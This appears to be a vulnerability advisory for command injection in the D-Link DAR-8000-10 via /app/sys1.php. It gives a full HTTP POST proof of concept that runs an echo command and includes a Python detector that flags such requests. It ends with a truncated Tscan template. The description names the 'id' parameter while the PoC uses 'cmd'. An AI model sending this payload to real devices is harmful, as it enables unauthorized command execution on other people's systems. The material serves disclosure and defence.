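0x01 Vulnerability description
D-Link DAR-8000-10 contains an operating system command injection vulnerability. The flaw arises because the id parameter of the file /app/sys1.php leads to OS command injection.
0x02 Vulnerability reproduction
(1) Payload target path: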
/app/sys1.php
(2) Command execution PoC:
POST /app/sys1.php HTTP/1.1
Host: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

cmd=echo+12345111
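
A defender-side check for the request above, as an added example that is not part of the original page: it parses a raw HTTP request captured at a proxy or WAF and flags requests to /app/sys1.php that carry the cmd parameter used in the PoC body or the id parameter named in the description. The helper names (normalise_path, inspect_request) and the sample requests are constructed for illustration.

```python
import posixpath
from urllib.parse import urlsplit, unquote, parse_qs

VULN_PATH = "/app/sys1.php"      # endpoint named in the write-up
SUSPECT_PARAMS = ("cmd", "id")   # "cmd" is in the PoC body, "id" in the description

def normalise_path(target: str) -> str:
    """Decode and collapse the request path so encoded or dotted forms compare equal."""
    path = unquote(urlsplit(target).path)
    return posixpath.normpath("/" + path.lstrip("/")).lower()

def inspect_request(raw: bytes) -> dict:
    """Return a finding for one raw HTTP/1.x request (hypothetical helper)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return {"match": False, "reason": "malformed request line"}
    method, target, _ = parts
    if normalise_path(target) != VULN_PATH:
        return {"match": False, "reason": "other path"}
    headers = dict(
        (k.strip().lower(), v.strip())
        for k, _, v in (line.partition(":") for line in lines[1:])
    )
    # Collect parameters from the query string and, for form posts, the body.
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        form = parse_qs(body.decode("latin-1"), keep_blank_values=True)
        for key, values in form.items():
            params.setdefault(key, []).extend(values)
    hits = {k: params[k] for k in SUSPECT_PARAMS if k in params}
    reason = "suspect parameter on vulnerable endpoint" if hits else "no suspect parameter"
    return {"match": bool(hits), "method": method, "params": hits, "reason": reason}

# Constructed sample requests (not captured traffic).
SAMPLE_POC = (b"POST /app/sys1.php HTTP/1.1\r\nHost: 127.0.0.1\r\n"
              b"Content-Type: application/x-www-form-urlencoded\r\n"
              b"Content-Length: 17\r\n\r\ncmd=echo+12345111")
SAMPLE_VARIANT = (b"POST /app/./SYS1.php HTTP/1.1\r\nHost: 127.0.0.1\r\n"
                  b"Content-Type: application/x-www-form-urlencoded\r\n\r\ncmd=echo+1")
SAMPLE_BENIGN = b"GET /app/index.php HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n"

if __name__ == "__main__":
    for sample in (SAMPLE_POC, SAMPLE_VARIANT, SAMPLE_BENIGN):
        print(inspect_request(sample))
```
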
0x03 Using the PoC (Tscan verification)
params: []
name: D-Link DAR-8000操作系统命令注入漏洞
se